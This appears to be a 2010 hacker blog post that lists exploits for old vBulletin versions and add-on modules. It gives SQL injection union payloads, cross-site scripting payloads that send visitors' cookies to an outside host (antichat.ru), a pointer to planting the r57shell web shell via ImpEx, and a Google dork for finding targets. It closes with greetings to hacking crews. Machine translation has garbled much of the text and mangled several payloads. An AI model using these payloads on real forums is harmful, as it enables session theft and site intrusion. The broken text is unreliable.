Loading

Monday, February 22, 2010

vbulletin forum exploit

vBulletin 2

2,3 .* - SQL injection
Error404 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM WHERE calendar_events EventID \u003d 14) order by eventdate

2 .*.* - XSS
[E * MAIL] aaa@aaa.aa " 's \u003d' [/ E * MAIL] 'sss \u003d" i \u003d new Image (); i.src \u003d' http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss \u003d null "style \u003d top: expression (eval (this.sss));


vBulletin 3,0

3.0.0 - XSS
http://www.strona.com/forumpath//sea...posts\u003d0&query \u003d

3.0-3.0.4
Error404 [] \u003d 1 & f \u003d 2 & koma \u003d ". Sistem

3.0.3-3.0.9 XSS

3.0.9 dan 3.5.4 - XSS
Error404 G_HTML \u003d% 3Cp% 3E% 3C% 2Fp% 3E & s \u003d & f \u003d 3 & do \u003d postthread & post hash \u003d c8d3fe38b082b6d3381cbee17f1f1aca & poststarttim e \u003d '% 2Bimg \u003d new Image (); img.src \u003d "http://antichat.ru/cgi-bin/ s.jpg? "+ document.cookie;% 2B '& sbutton \u003d% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2% F3% FE +% F2% E5% EC% F3 & parseurl \u003d 1 & disablesmilies \u003d 1 & emailupdate \u003d 3 & postpoll \u003d yes & polloptions \u003d 1234 & openclose \u003d 1 & stic kun tongkat \u003d

1 & iconid \u003d 0


vBulletin 3,5

TITLE:--------->Tes
BODY:---------->Obojętnie
LAIN OPTIONSObojętnie

3.5.3 - XSS

Error404
pass: Twoje Hasło
email: jakis@email.com">. nomatt
Catatan Tentang pembatasan panjang
****
forum / profile.php? do \u003d editoptions
Menerima Email dari Lain Anggota \u003d yes
****
Anda www.strona.com/forumpath/sendmessage.php?do\u003dmailmember&u \u003d (id)

3.5.4
Error404

3.5.4 - XSS
Error404 t-Length:% 2033% 0d% 0a% 0d% 0aHacked!% 0d% 0a% 0d% 0a


Moduły lakukan vBulletin

vBug Tracker 3.5.1 - XSS
Error404 g_statusid \u003d 0 & vbug_severityid \u003d 0 & vbug_versionid \u003d 0 & sebagai signment \u003d 0 & sortfield \u003d lastedit & sortorder \u003d% 22% 3Cscri pt% 3Eimg \u003d new Image (); img.src \u003d "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;% 3C/script% 3E

ImpEx 1,74
http://www.strona.com/forumpath/impe...d/r57shell.txt
Error404

ibProArcade 2.x - SQL injection
Error404 union select password from user where userid \u003d [any_user]

google dork:
"Powered by vBulletin ® Version [nomer_version]"



--------------------------------------

oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
K-159
lirva32

And Also My LuvLy :
..::.E.Z.R (The deepest Love I'v ever had..).::..

in memorial :
1. Monique (terima kasih atas semua kenangan terindah yang pernah kau berikan)
MAAFKAN ATAS SEMUA DOSA DAN SALAHKU
2. Dewi S.
3. W. Devi Amelia
4. S. Anna

oO0:::A hearthy handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ jatimcrew staff
~ whitecyber staff
~ lumajangcrew staff
~ unix_dbuger, boys_rvn1609, jaqk, byz9991, bius, g4pt3k, anharku, wandi, 5yn_4ck, kiddies, bom2
~ arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, black_samuraixxx, ucrit_penyu, wendys182, cybermuttaqin
~ k3nz0, thomas_ipt2007, blackpaper, nakuragen, candra
~ whitehat, wenkhairu, Agoes_doubleb, diki, lumajangcrew a.k.a adwisatya a.k.a xyberbreaker, wahyu_antijasakom
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
~ All members of jatimcrew
~ All members of Anti-Jasakom
~ All members of whitecyber
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding, #jatimcrew, #antijasakom, #whitecyber

0 komentar:

Categories

Stats

kumpulblogger